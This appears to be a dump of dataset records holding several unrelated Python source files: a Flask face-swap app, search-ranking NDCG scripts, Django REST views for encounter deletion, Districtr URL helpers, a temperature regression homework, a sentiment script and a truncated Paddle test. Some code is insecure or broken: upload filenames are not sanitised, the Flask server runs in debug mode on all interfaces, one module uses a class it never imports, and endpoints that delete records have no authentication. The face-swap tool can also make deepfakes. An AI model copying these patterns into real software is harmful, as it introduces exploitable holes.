clear_folder('faces')\n clear_folder('uploads')\n if 'source' not in request.files:\n return \"No image part in the form\"\n\n source = request.files['source']\n if source.filename == '':\n return \"No selected image\"\n\n source.save('uploads/' + source.filename)\n\n faces = detect_faces('uploads/' + source.filename)\n filenames = []\n for i, face in enumerate(faces):\n cropped_image = (Image.open('uploads/' + source.filename)).crop(face['bbox'])\n filename = 'faces/face' + str(i + 1) + '.jpg'\n filenames.append('face' + str(i + 1) + '.jpg')\n cropped_image.save(filename)\n print(filenames)\n # result_image = swap_faces(detect_faces('uploads/' + target.filename), source_face, 'uploads/' + target.filename)\n # cv2.imwrite('uploads/result.jpg', result_image)\n return render_template('face_detect_and_select.html', filenames=filenames)\n\n\n@app.route('/target_face_upload_and_swap', methods=['GET', 'POST'])\ndef target_face_upload_and_swap():\n face_number = -1\n if request.method == 'POST':\n selected_value = request.form.get('selected_file') # Get the selected dropdown value\n face_number = int(selected_value[-1]) - 1\n print(face_number)\n # Use the selected_value as needed\n if 'target' not in request.files:\n return \"No image part in the form\"\n print(os.listdir('uploads')[0])\n#source = Image.open('uploads/' + os.listdir('uploads')[0])\n source_face = detect_faces('uploads/' + os.listdir('uploads')[0])[face_number]\n target = request.files['target']\n if target.filename == '':\n return \"No selected image\"\n\n target.save('uploads/' + target.filename)\n\n result_image = swap_faces(detect_faces('uploads/' + target.filename), source_face, 'uploads/' + target.filename)\n cv2.imwrite('uploads/result.jpg', result_image)\n return render_template('result_image.html', target_path=target.filename,\n image_filename='result.jpg')\n\n\ndef detect_faces(image_path):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n fapp = FaceAnalysis(name='buffalo_l')\n fapp.prepare(ctx_id=0, det_size=(640, 640))\n faces = fapp.get(image)\n return faces\n\n\ndef swap_faces(faces, source_face, image_path):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n swapper = insightface.model_zoo.get_model('inswapper_128.onnx', download=True, download_zip=False)\n faces = sorted(faces, key=lambda x: x.bbox[0])\n res = image.copy()\n for face in faces:\n res = swapper.get(res, face, source_face, paste_back=True)\n return res\n\n\ndef clear_folder(folder_path):\n try:\n # List all files in the folder\n file_list = os.listdir(folder_path)\n\n # Loop through the files and delete each one\n for file_name in file_list:\n file_path = os.path.join(folder_path, file_name)\n if os.path.isfile(file_path):\n os.remove(file_path)\n\n return True # Successfully cleared all images\n except Exception as e:\n return False # An error occurred\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n","repo_name":"koni4045/faceswapRepo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6596101741","text":"import re, json\r\nfrom seg_utils import Tokenizer\r\nfrom tqdm import tqdm\r\nfrom qw import query_weight\r\nfrom utils import cal_ndcg\r\nfrom collections import Counter\r\nfrom data_utils import preprocess_text\r\n\r\ndef gen_true_data(source_path, out_path):\r\n t = Tokenizer()\r\n res = []\r\n total_num = len(open(source_path, encoding=\"utf8\").readlines())\r\n with open(source_path, encoding=\"utf8\") as fin:\r\n for line in tqdm(fin, total=total_num):\r\n query = line.strip().split(\"\\t\")[0]\r\n senten2term, _ = t.tokenize(query)\r\n if len(senten2term) < 2: continue\r\n res.append(\"\\t\".join(senten2term) + \"\\n\")\r\n with open(out_path, \"w\", encoding=\"utf8\") as fin:\r\n fin.write(\"\".join(res))\r\n\r\ndef test():\r\n qw = query_weight()\r\n pred_num, total_num = 0, 0\r\n text = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/querytrue.txt\", encoding=\"utf8\").readlines()[1:159]]\r\n for (i, (query, label)) in enumerate(text):\r\n #query = \"移动医疗\"\r\n res = qw.run_step(query)\r\n pred = sorted(res, key=lambda d: d[1], reverse=True)[0]\r\n if pred[0] == label.split()[0]: pred_num += 1\r\n else: print(str(i+1) + \"\\t\" + query + \"\\t\" +\" \".join([k+\":\"+str(v) for k, v in res]) + \"\\t\" + pred[0] + \"_\" + label.split()[0])\r\n #if set([k for k, v in res]).difference(set(label.split())): print(str(i+1), '\\t', \" \".join([k for k, v in res]), '\\t', label)\r\n total_num += 1\r\n print(\"acc: %f\" % (round(pred_num / total_num, 3)))\r\n a=1\r\n\r\ndef cal_feedback_ndcg(file_name=\"get_jdcv_data/feedback.res\"):\r\n query_label, query_ndcg, dcg_sum, ndcg_sum = {}, {}, 0.0, 0.0\r\n text = [e.strip().split(\"\\t\") for e in open(file_name, encoding=\"utf8\").readlines()]\r\n for i in range(len(text)):\r\n ele = text[i]\r\n if i == 0: field2id = {e: i for i, e in enumerate(ele)}\r\n else:\r\n keyword, is_correct = ele[field2id['keyword']], ele[field2id['is_correct']]\r\n if keyword not in query_label: query_label[keyword] = []\r\n query_label[keyword].append(is_correct)\r\n for query, label in query_label.items():\r\n label_freq = sorted(Counter(label).items(), key=lambda d: d[1], reverse=True)\r\n if len(label_freq) == 1 or (len(label_freq) == 2 and label_freq[1][1] < 3):\r\n pass; #print(query, '\\t', label); #continue\r\n dcg, idcg, ndcg = cal_ndcg(label, 20)\r\n query_ndcg[query] = [round(dcg, 3), round(idcg, 3), round(ndcg, 3)]\r\n dcg_sum += dcg; ndcg_sum += ndcg\r\n sorted_query_ndcg = sorted(query_ndcg.items(), key=lambda d: d[1][2]); #print(json.dumps(query_ndcg, ensure_ascii=False))\r\n dcg_avg, ndcg_avg = dcg_sum / len(query_ndcg), ndcg_sum / len(query_ndcg)\r\n print(\"file_name: %s\\ttotal query: %d\\tvalid query: %d\\tdcg_avg: %.3f\\tndcg_avg: %.3f\" % (file_name, len(query_label), len(query_ndcg), dcg_avg, ndcg_avg))\r\n return dcg_avg, ndcg_avg, query_ndcg\r\n\r\ndef cal_ndcg_train_data(topk=1):\r\n ndcg_sum = 0.0\r\n matchObj = re.compile(r'(.+)\\t([0-9]+)', re.M | re.I) ; qw = query_weight()\r\n text = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/label.data\", encoding=\"utf8\").readlines() if e.strip()]\r\n for line in tqdm(text, total=len(text)):\r\n seg_line = [(preprocess_text(e.split(\":\")[0]), e.split(\":\")[1]) for e in line]\r\n sorted_seg_line = sorted(seg_line, key=lambda d: d[1], reverse=True)\r\n rel = {k: len(sorted_seg_line)-i-1 for i, (k, v) in enumerate(sorted_seg_line)}\r\n query = \" \".join([e[0] for e in seg_line])\r\n dcg, idcg, ndcg = get_one_query_ndcg(qw, query, rel, topk)\r\n ndcg_sum += ndcg\r\n ndcg_avg = ndcg_sum / len(text)\r\n print(\"ndcg_avg@%d: %.3f\" % (topk, ndcg_avg))\r\n\r\ndef cal_ndcg_manual_data(topk=1):\r\n qw = query_weight(); ndcg_sum = 0.0\r\n text = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/querytrue.txt\", encoding=\"utf8\").readlines()[1:159] if e.strip()]\r\n for (query, label) in tqdm(text, total=len(text)):\r\n seg_label = label.split()\r\n rel = {e: len(seg_label)-i-1 for i, e in enumerate(seg_label)}\r\n dcg, idcg, ndcg = get_one_query_ndcg(qw, query, rel, topk)\r\n ndcg_sum += ndcg\r\n ndcg_avg = ndcg_sum / len(text)\r\n print(\"ndcg_avg@%d: %.3f\" % (topk, ndcg_avg))\r\n\r\ndef get_one_query_ndcg(qw, query, rel, topk=1):\r\n res = qw.run_step(query)\r\n pred = sorted(res, key=lambda d: d[1], reverse=True)\r\n label_list = [rel.get(k, 0) for k, v in pred]\r\n dcg, idcg, ndcg = cal_ndcg(label_list, topk)\r\n return dcg, idcg, ndcg\r\n\r\ndef aa():\r\n res = {}\r\n dcg_avg_old, ndcg_avg_old, query_ndcg_old = cal_feedback_ndcg(\"get_jdcv_data/feedback2982.res\")\r\n dcg_avg_new, ndcg_avg_new, query_ndcg_new = cal_feedback_ndcg(\"get_jdcv_data/feedback2996.res\")\r\n for k, v in query_ndcg_old.items():\r\n dcg_old, ndcg_old, dcg_new, ndcg_new = query_ndcg_old[k][0], query_ndcg_old[k][2], query_ndcg_new.get(k, [0,0,0])[0], query_ndcg_new.get(k, [0,0,0])[2]\r\n res[k] = [dcg_old, ndcg_old, dcg_new, ndcg_new]\r\n #print(json.dumps(res, ensure_ascii=False))\r\n pass\r\n\r\ndef cal_weight_effect():\r\n dcg_new, ndcg_new, dcg_baseline, ndcg_baseline = 1e-8, 1e-8, 1e-8, 1e-8\r\n text = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/feedback2982.res\", encoding=\"utf8\").readlines()]\r\n text_baseline = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/feedback2982.res.baseline\", encoding=\"utf8\").readlines()]\r\n text_new = [e.strip().split(\"\\t\") for e in open(\"get_jdcv_data/feedback2982.res.new\", encoding=\"utf8\").readlines()]\r\n label_score = {\"_\".join([keyword, cv_id]): is_correct for id, rank, cv_id, pid, task_id, is_correct, createtime, keyword in text[1:]}\r\n for keyword, cv_ids in text_baseline:\r\n label_list = [label_score.get(\"_\".join([keyword, e]), 0) for e in cv_ids.split()]\r\n dcg, idcg, ndcg = cal_ndcg(label_list, 15)\r\n dcg_baseline += dcg; ndcg_baseline += ndcg\r\n avg_dcg_baseline = dcg_baseline / len(text_baseline); avg_ndcg_baseline = ndcg_baseline / len(text_baseline)\r\n for keyword, cv_ids in text_new:\r\n label_list = [label_score.get(\"_\".join([keyword, e]), 0) for e in cv_ids.split()]\r\n dcg, idcg, ndcg = cal_ndcg(label_list, 15)\r\n dcg_new += dcg; ndcg_new += ndcg\r\n avg_dcg_new = dcg_new / len(text_new); avg_ndcg_new = ndcg_new / len(text_new)\r\n print(\"avg_dcg_baseline: %.6f\\tavg_ndcg_baseline: %.6f\\navg_dcg_new: %.6f\\tavg_ndcg_new: %.6f\" % \\\r\n (avg_dcg_baseline, avg_ndcg_baseline, avg_dcg_new, avg_ndcg_new))\r\n a=1;\r\n\r\ndef t():\r\n import tensorflow as tf\r\n input_ids = [[6809, 4638, 689, 2900, 3403, 102, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\r\n _abs = tf.abs(input_ids); _used = tf.sign(_abs)\r\n _lengths = tf.reduce_sum(_used, reduction_indices=1)\r\n sess = tf.Session()\r\n fetch = sess.run([_abs, _used, _lengths], {tf.placeholder(dtype=tf.int64, shape=[None, len(input_ids[0])], name=\"input_ids\"): input_ids})\r\n aa=set([5,1,2,3,4]).symmetric_difference(set([2,1,4,3,5]))\r\n a=1\r\n\r\nif __name__ == \"__main__\":\r\n t()\r\n a=len(\"211\") #\"211\".isdigit()\r\n #gen_true_data(\"get_jdcv_data/query.freq.csv\", \"get_jdcv_data/query.true\")\r\n #test(); exit()\r\n #cal_feedback_ndcg(\"get_jdcv_data/feedback2982.res\")\r\n #cal_ndcg_train_data()\r\n #cal_ndcg_manual_data(1)\r\n #aa()\r\n cal_weight_effect()\r\n pass","repo_name":"yiwen92/my-project","sub_path":"queryweight/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"18587640167","text":"from .serializers import LogSerializer\r\nfrom rest_framework import viewsets, permissions\r\n\r\nclass LogViewSet(viewsets.ModelViewSet):\r\n permission_classes = [\r\n permissions.IsAuthenticated,\r\n ]\r\n serializer_class = LogSerializer\r\n\r\n def get_queryset(self):\r\n return self.request.user.users.all()\r\n\r\n def perform_create(self, serializer):\r\n serializer.save(owner=self.request.user)\r\n\r\n","repo_name":"hsima023/garden-watch-full-stack","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10322158011","text":"import us\n\n\ndef ids(state):\n \"\"\"\n URL for accessing districtr identifiers.\n\n Args:\n state: Name of the state (e.g. `\"wisconsin\"`) for which we're retrieving\n districtr identifiers.\n\n Returns:\n String with the appropriate URL.\n \"\"\"\n # If we're in michigan, then we use the 'beta' pipeline instead of the 'prod'\n # one.\n pipeline = \"beta\" if state == us.states.MI else \"prod\"\n if state == us.states.MI:\n prefix = \"https://o1siz7rw0c.execute-api.us-east-2.amazonaws.com\"\n else:\n prefix = \"https://k61e3cz2ni.execute-api.us-east-2.amazonaws.com\"\n\n return f\"{prefix}/{pipeline}/submissions/districtr-ids/{state.name.lower()}\"\n\n\ndef csvs(state, ptype=\"plan\"):\n \"\"\"\n URL for accessing districtr plan metadata.\n\n Args:\n state: `us.States` object (e.g. `us.states.WI`)\n ptype: Type of plan we're retrieving; defaults to `\"plan\"`.\n\n Returns:\n String with the appropriate URL.\n \"\"\"\n pipeline = \"beta\" if state == us.states.MI else \"prod\"\n if state == us.states.MI:\n prefix = \"https://o1siz7rw0c.execute-api.us-east-2.amazonaws.com\"\n else:\n prefix = \"https://k61e3cz2ni.execute-api.us-east-2.amazonaws.com\"\n\n suffix = f\"?type={ptype}&length=10000\"\n\n return f\"{prefix}/{pipeline}/submissions/csv/{state.name.lower()}{suffix}\"\n\n\ndef one(identifier):\n \"\"\"\n URL for accessing an individual districtr plan.\n\n Args:\n identifier: districtr identifier.\n\n Returns:\n String with the appropriate URL.\n \"\"\"\n return f\"https://districtr.org/.netlify/functions/planRead?id={identifier}\"\n","repo_name":"mggg/gerrytools","sub_path":"gerrytools/data/URLs.py","file_name":"URLs.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"18594077399","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 25 11:56:41 2020\n\n@author: anony1\n\"\"\"\n\n#Time Series and Simple Linear Regression p620 Deitel & Deitel\nimport pandas as pd\nnyc = pd.read_csv('C:\\\\CIS2532\\\\Hwk10\\\\ave_yearly_temp_nyc_1895-2017.csv')\nnyc.columns = ['Date', 'Temperature', 'Anomaly'] #Rename Value col to Temperature\nnyc.Date = nyc.Date.floordiv(100) \nnyc.head(3)\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(\nnyc.Date.values.reshape(-1,1), nyc.Temperature.values, \nrandom_state=11)\n#Confirm the 75% - 25% train-test split by checking shapes:\nX_train.shape\nX_test.shape\nfrom sklearn.linear_model import LinearRegression\nlin_regress = LinearRegression()\nlin_regress.fit(X=X_train, y=y_train)\nlin_regress.coef_\nlin_regress.intercept_\npredicted = lin_regress.predict(X_test)\nexpected = y_test\n\nfor p, e in zip(predicted[::5], expected[::5]):\n print(f'predicted: {p:.2f}, expected: {e:.2f}')\n \n#Predicting future temps and estimating past temps\npredict = (lambda x: lin_regress.coef_ * x +\nlin_regress.intercept_)\npredict(2018)\npredict(1890)\n#Visualize the dataset w/the regression line\nimport seaborn as sns\n\naxes = sns.scatterplot(data=nyc, x='Date', y='Temperature', \n hue='Temperature', palette='winter', legend=False)\n##axes.set_ylim(10, 70) #better shows lin regression line\n\nimport numpy as np\nx = np.array([min(nyc.Date.values), max(nyc.Date.values)])\ny = predict(x)\nimport matplotlib.pyplot as plt\nline = plt.plot(x, y) \n#Looks better if comment out the set_ylim above\n#Shows scatterplot w/line of regress thru it\n\n#To answer question 2, must go back to NOAA website and get Jan\n# data for NYC - make sure at top to go to CITY\n#https://www.ncdc.noaa.gov/cag/city/time-series/USH00305801/tavg/1/1/1895-2017?base_prd=true&begbaseyear=1901&endbaseyear=2000\n#from orig website:\n#https://www.ncdc.noaa.gov/cag\n#\n#After plot it, then click excel button to download the .csv file\n# of your data.\n#That data file named:\n##############################################\nnycJan = pd.read_csv('C:\\\\CIS2532\\\\Hwk10\\\\ave_yearly_tempJAN_nyc_1895-2017.csv')\nnycJan.columns = ['Date', 'Temperature', 'Anomaly'] #Rename Value col to Temperature\nnycJan.Date = nyc.Date.floordiv(100) \nnycJan.head(3)\nfrom sklearn.model_selection import train_test_split\nX_trainJ, X_testJ, y_trainJ, y_testJ = train_test_split(\nnycJan.Date.values.reshape(-1,1), nycJan.Temperature.values, \nrandom_state=11)\n#Confirm the 75% - 25% train-test split by checking shapes:\nX_trainJ.shape\nX_testJ.shape\nfrom sklearn.linear_model import LinearRegression\nlin_regressJan = LinearRegression()\nlin_regressJan.fit(X=X_trainJ, y=y_trainJ)\nlin_regressJan.coef_\nlin_regressJan.intercept_\npredictedJan = lin_regressJan.predict(X_testJ)\nexpectedJan = y_testJ\n\nfor p, e in zip(predictedJan[::5], expectedJan[::5]):\n print(f'predicted January: {p:.2f}, expected January: {e:.2f}')\n \n#Predicting future temps and estimating past temps\npredictJan = (lambda x: lin_regressJan.coef_ * x +\nlin_regressJan.intercept_)\npredictJan(2018)\npredictJan(1890)\n#Visualize the dataset w/the regression line\nimport seaborn as sns\n\naxesJan = sns.scatterplot(data=nycJan, x='Date', y='Temperature', \n hue='Temperature', palette='winter', legend=False)\n##axes.set_ylim(10, 70) #better shows lin regression line\n\nimport numpy as np\nx = np.array([min(nycJan.Date.values), max(nycJan.Date.values)])\ny = predict(x)\nimport matplotlib.pyplot as plt\nline = plt.plot(x, y) \n#Looks better if comment out the set_ylim above\n#Shows scatterplot w/line of regress thru it\n\n#To answer question 2, must go back to NOAA website and get Jan\n# data for NYC - make sure at top to go to CITY\n#https://www.ncdc.noaa.gov/cag/city/time-series/USH00305801/tavg/1/1/1895-2017?base_prd=true&begbaseyear=1901&endbaseyear=2000\n#from orig website:\n#https://www.ncdc.noaa.gov/cag\n#\n#After plot it, then click excel button to download the .csv file\n# of your data.\n#That data file named:\n\n\n","repo_name":"serviceberry1/CIS2532","sub_path":"Hwk10/Q2nyc1.py","file_name":"Q2nyc1.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10485761123","text":"from rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import permissions\nfrom encounterapp.models.modifydelete import ModifyDelete\nfrom encounterapp.models.encounter import Encounter\nfrom encounterapp.serializers.encounter import AllEncounterSerializer\nfrom encounterapp.serializers.modifydelete import ModifyDeleteSerializer,EncounterAdminStatusSerializer,ModifyDeleteListSerializer,EncounterFlagDeadSerializer\nfrom datetime import datetime, timedelta\n\n\n\n\nclass IsPostOrIsAuthenticated(permissions.BasePermission):\n\n def has_permission(self, request, view):\n \treturn request.user and request.user.is_authenticated\n\n\nclass ModifyDeleteDetail(APIView):\n permission_classes = (IsPostOrIsAuthenticated ,)\n serializer_class = ModifyDeleteSerializer\n\n def get(self, request):\n modify_delete_obj = ModifyDelete.objects.all().order_by(\"-id\")\n serializer = ModifyDeleteListSerializer(modify_delete_obj,\\\n many=True, context={\"request\":request})\n return Response(serializer.data, status=200)\n\n def post(self,request):\n serializer = ModifyDeleteSerializer(data=request.data)\n if serializer.is_valid():\n modify_delete_obj = ModifyDelete()\n encounter_obj = Encounter.objects.filter(id=serializer.validated_data['encounter'].id)\n if encounter_obj:\n encounter_obj = Encounter.objects.get(id=serializer.validated_data['encounter'].id)\n if encounter_obj.active == False:\n return Response({\"message\":\"This encounter has already been deleted.\"}, status=400)\n if encounter_obj.request_counter >= 3:\n return Response({\"message\":\"Your request limit already reached.\"},status=400)\n if ModifyDelete.objects.filter(encounter__id = serializer.validated_data['encounter'].id,flag='delete') or ModifyDelete.objects.filter(encounter__id =serializer.validated_data['encounter'].id,flag='modify'):\n return Response({\"message\":\"You already have a request sent.\"}, status=400)\n if serializer.validated_data['flag'] == \"modify\":\n if serializer.validated_data['reason_for_modification'] == None:\n return Response({\"message\":\"Please enter reason for modification.\"},status=400)\n modify_delete_obj.reason_for_modification = serializer.validated_data['reason_for_modification']\n modify_delete_obj.modify_status = \"pending\"\n\n if serializer.validated_data['flag'] == \"delete\":\n if serializer.validated_data['reason_for_deletion'] == \"other\" and serializer.validated_data['other_reason_for_deletion'] == None:\n return Response({\"message\":\"You should enter the field either reason for deletion or other reason for deletion.\"},status=400)\n if serializer.validated_data['reason_for_deletion'] == \"other\":\n modify_delete_obj.other_reason_for_deletion = serializer.validated_data['other_reason_for_deletion']\n modify_delete_obj.reason_for_deletion = serializer.validated_data['reason_for_deletion']\n modify_delete_obj.delete_status = 'pending'\n modify_delete_obj.author = request.user\n modify_delete_obj.encounter = serializer.validated_data['encounter']\n modify_delete_obj.flag = serializer.validated_data['flag']\n modify_delete_obj.save()\n return Response({\"message\":\"Your request sent successfully.\"},status=200)\n return Response({\"message\":\"Encounter doesn't exists.\"},status=400)\n return Response(serializer.errors,status=400)\n\n\nclass EncounterAdminStatus(APIView):\n permission_classes = (IsPostOrIsAuthenticated ,)\n serializer_class = EncounterAdminStatusSerializer\n\n def get(self, request, id):\n if ModifyDelete.objects.filter(id=id):\n mod_obj = ModifyDelete.objects.get(id=id)\n serializer = ModifyDeleteListSerializer(mod_obj, context={\"request\":request})\n return Response(serializer.data, status=200)\n return Response({\"message\":\"Flag id do not match.\"}, status=400)\n\n def put(self, request, id):\n if ModifyDelete.objects.filter(id=id):\n mod_obj = ModifyDelete.objects.get(id=id)\n serializer = EncounterAdminStatusSerializer(mod_obj,\\\n data=request.data,context={'request': request},partial=True)\n if request.user.admin:\n if serializer.is_valid():\n if mod_obj.delete_status == 'pending' and serializer.validated_data['delete_status'] == 'deleted':\n mod_obj.delete_status = 'deleted'\n mod_obj.deleted_at = datetime.now()\n mod_obj.restore_expiry_date = datetime.now()+timedelta(days=30)\n mod_obj.save()\n\n encounter_obj = Encounter.objects.get(id=mod_obj.encounter.id)\n encounter_obj.active = False\n encounter_obj.request_counter += 1\n visual_obj = Visualization.objects.filter(encounter_id=encounter_obj.id)\n if visual_obj:\n visual_obj = Visualization.objects.get(encounter_id=encounter_obj.id)\n visual_obj.delete()\n encounter_obj.save()\n return Response({\"message\":\"Encounter deleted successfully.\"}, status=200)\n if mod_obj.delete_status == 'pending' and serializer.validated_data['delete_status'] == 'rejected':\n mod_obj.delete_status = 'rejected'\n mod_obj.flag = ''\n mod_obj.save()\n return Response({\"message\":\"Encounter delete request is rejected.\"}, status=200)\n if mod_obj.modify_status == 'pending':\n if serializer.validated_data['modify_status'] == 'approved':\n mod_obj.modify_approved_at = datetime.now()\n mod_obj.modify_expiry_date = datetime.now()+timedelta(days=7)\n mod_obj.modify_status = 'approved'\n mod_obj.save()\n\n encounter_obj = Encounter.objects.get(id=mod_obj.encounter.id)\n encounter_obj.request_counter += 1\n\n visual_obj = Visualization.objects.filter(encounter_id=encounter_obj.id)\n if visual_obj:\n visual_obj = Visualization.objects.get(encounter_id=encounter_obj.id)\n visual_obj.delete()\n encounter_obj.save()\n return Response({\"message\":\"Modification request approved.\"}, status=200)\n if serializer.validated_data['modify_status'] == 'rejected':\n mod_obj.modify_status = 'rejected'\n mod_obj.flag = ''\n mod_obj.save()\n return Response({\"message\": \"Modification request rejected.\"}, status=200)\n return Response({\"message\":\"Neither modify nor delete action performed\"}, status=200)\n return Response(serializer.errors, status=400)\n return Response({\"message\":\"Only admin can change status.\"}, status=401)\n return Response({\"message\":\"Flag id do not match.\"}, status=400)\n\n\n\nclass EncounterFlagDead(APIView):\n permission_classes = (IsPostOrIsAuthenticated ,)\n serializer_class = EncounterFlagDeadSerializer\n\n def put(self, request, id):\n mod_obj = ModifyDelete.objects.get(id=id)\n serializer = EncounterFlagDeadSerializer(mod_obj, data=request.data,\\\n context={'request': request}, partial=True)\n if serializer.is_valid():\n if mod_obj.modify_status == 'approved':\n if serializer.validated_data['modify_status'] == 'modified':\n mod_obj.modify_status = 'modified'\n mod_obj.flag = ''\n mod_obj.save()\n return Response({\"message\":\"Encounter modified successfully and flag killed.\"}, status=200)\n return Response({\"message\":\"Only modify status equals to modified can kill tha flag.\"},status=400)\n return Response({\"message\": \"modify status most be approved before killing flag.\"}, status=400)\n return Response(serializer.errors, status=400)\n\n\n\nclass EncounterRestore(APIView):\n permission_classes = (IsPostOrIsAuthenticated ,)\n\n def put(self, request,encounter_id):\n encounter_obj = Encounter.objects.filter(id=encounter_id, active=False)\n if encounter_obj:\n mod_obj = ModifyDelete.objects.filter(encounter=encounter_id, delete_status='deleted', author=request.user)\n if mod_obj:\n mod_obj = ModifyDelete.objects.get(encounter=encounter_id, delete_status='deleted', author=request.user)\n if datetime.now().timestamp() < mod_obj.restore_expiry_date.timestamp():\n mod_obj.delete_status = ''\n mod_obj.flag = ''\n mod_obj.save()\n\n encounter_obj = Encounter.objects.get(id=encounter_id)\n encounter_obj.active = True\n visual_obj = Visualization.objects.filter(encounter_id=encounter_obj.id)\n if visual_obj:\n visual_obj = Visualization.objects.get(encounter_id=encounter_obj.id)\n visual_obj.delete()\n encounter_obj.save()\n return Response({'messsage':'Encounter restored successfully.'}, status=200)\n return Response({'message':\"Restoration time expired.\"}, status=400)\n return Response({\"message\":\"flag doesn't exists\"},status=400)\n return Response({'message':\"No encounter deleted found.\"}, status=400)\n\n\n\nclass CheckModifyExpiry(APIView):\n\n def get(self,request):\n mod_obj = ModifyDelete.objects.filter(modify_status='approved')\n if mod_obj:\n for i in mod_obj:\n if datetime.now().timestamp() > i.modify_expiry_date.timestamp():\n i.modify_status = 'expired'\n i.flag = ''\n i.save()\n return Response({'message':'All the encounter flags with modify date expired are killed'},status=200)\n return Response({\"message\":\"No encounter deleted found.\"}, status=400)\n\n\nclass CheckRestoreExpiry(APIView):\n\n def get(self,request):\n mod_obj = ModifyDelete.objects.filter(delete_status='deleted')\n if mod_obj:\n for i in mod_obj:\n if datetime.now().timestamp() > i.restore_expiry_date.timestamp():\n encounter_obj = Encounter.objects.get(id=i.encounter.id)\n encounter_obj.delete()\n return Response({'message':'All the encounter with restoration date expired are removed from recycle bin'},status=200)\n return Response({\"message\":\"No encounter deleted found.\"}, status=400)\n\n\n\nclass Recyclebin(APIView):\n permission_classes = (IsPostOrIsAuthenticated ,)\n serializer_class = AllEncounterSerializer\n\n def get(self,request):\n encounter_obj = Encounter.objects.filter(active=False)\n serializer = AllEncounterSerializer(encounter_obj,many=True,context={\"request\":request})\n return Response(serializer.data,status=200)\n\n\n\n\n\n\n","repo_name":"AbhiyantrikTechnology/DentalHub-Backend","sub_path":"encounterapp/api/modifydelete.py","file_name":"modifydelete.py","file_ext":"py","file_size_in_byte":11766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40385692161","text":"import numpy as np\nimport time\nfrom os import listdir\nfrom os.path import isfile, join\nimport torch\nfrom transformers import BertForSequenceClassification, BertTokenizer\ndef get_sentiment(model, tokenizer, text_batch): #Large batches cause memory problems\n model.eval()\n with torch.no_grad():\n encoding = tokenizer(text_batch, return_tensors='pt', padding=True, truncation=True).to(device)\n outputs = model(encoding['input_ids']).logits\n pred = torch.argmax(outputs, axis=1)\n return pred.detach().numpy()\n\ndef get_sent(model, tokenizer, texts, batch_size=5):\n sent = [\"NULL\"] * len(texts)\n ind_buffer = []\n for i in range(len(texts)):\n if(texts[i] != \"NULL\"):\n ind_buffer.append(i)\n if(len(ind_buffer) == batch_size):\n sent_batch = get_sentiment(model, tokenizer, [texts[j] for j in ind_buffer])\n for j in range(len(sent_batch)):\n sent[ind_buffer[j]] = str(sent_batch[j])\n ind_buffer = list()\n if(len(ind_buffer) > 0):\n sent_batch = get_sentiment(model, tokenizer, [texts[j] for j in ind_buffer])\n for j in range(len(sent_batch)):\n sent[ind_buffer[j]] = str(sent_batch[j])\n ind_buffer = list()\n return sent\n\n\ndef rerun_file(file_path, new_path, model, tokenizer):\n\n fields, texts = [], []\n with open(file_path, 'r') as f:\n line = f.readline().strip()\n i = 0\n while(line != ''):\n if(line[0] != '1'):\n line = f.readline().strip()\n continue\n splt = line.split('\\t')\n text = splt[6].split('https://t.co')[0]\n if(len(text) < 10):\n line = f.readline().strip()\n continue\n i += 1\n\n fields.append(splt)\n texts.append(text)\n\n #id, date, time, language, geo, sentiment, text\n\n line = f.readline().strip()\n sents = get_sent(model, tokenizer, texts)\n print(file_path, new_path)\n with open(new_path, 'w+') as nf:\n for i in range(len(fields)):\n nf.write('\\t'.join(fields[i][:5] + [sents[i]] + [texts[i]]) + '\\n')\n\ndevice = 'cpu'\nmodel = BertForSequenceClassification.from_pretrained('./saves/sent_0.pt').to(device)\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n\ndir_path = \"./data/day/\"\nfile_paths = [f for f in listdir(dir_path) if isfile(join(dir_path, f)) and f[:4] == 'sent']\nk = 0\nfor fp in file_paths:\n k += 1\n if(isfile(\"./data/proc_day/proc\" + fp[4:])):\n continue\n print(f'Rerunning file: {fp} - Progress: {k} / {len(file_paths)} ')\n rerun_file(\"./data/day/\" + fp, \"./data/proc_day/proc\" + fp[4:], model, tokenizer)\n","repo_name":"niloofarshadab/Sentiment-Analysis-for-Twitter-data-during-COVID-19-Pandemic","sub_path":"rerun.py","file_name":"rerun.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16834209547","text":"from __future__ import print_function\n\nimport numpy as np\nimport unittest\nimport sys\nimport paddle\nimport paddle.fluid as fluid\nimport paddle.static\nfrom paddle.optimizer.lr import LRScheduler\n\npaddle.enable_static()\nSEED = 2021\n\n\nclass LR_New(LRScheduler):\n def __init__(self, learning_rate=1.0, last_epoch=-1, verbose=False):\n super(LR_New, self).__init__(learning_rate, last_epoch, verbose)\n\n def get_lr(self):\n self.base_lr = self.base_lr + 1\n self.last_epoch = self.last_epoch + 1\n return self.base_lr\n\n\n@unittest.skipIf(not paddle.is_compiled_with_ipu(),\n \"core is not compiled with IPU\")\nclass 